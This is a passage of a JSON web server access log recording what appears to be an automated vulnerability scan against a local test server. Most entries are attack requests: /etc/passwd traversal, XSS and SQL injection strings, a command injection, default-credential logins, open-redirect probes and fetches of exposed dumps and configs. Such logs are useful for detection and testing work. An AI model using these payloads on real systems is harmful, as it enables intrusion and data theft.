+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"name=admin&pwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin%202/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uir//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /localhost.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"]>&disclose;","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webtools/control/xmlrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /member/ajax_membergroup.php?action=post&membergroup=@`'`/*!50000Union+*/+/*!50000select+*/+md5(999999)+--+@`'` HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"user=admin&passwd=admin&challengePwd=&ok=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysqldump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mstore-api/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/metrics HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nginx.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /production.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/hana/xs/formLogin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cas/v1/tickets/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/users?username=anonymous HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/script%3E?page=securimage-wp-options%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.php?profile=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php/'%3E%3Csvg/onload=alert%6029K6BftyGQ44CvCaekU1UlZgKde%60%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elmah.axd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lui/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?download=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Ctexample.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:18 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 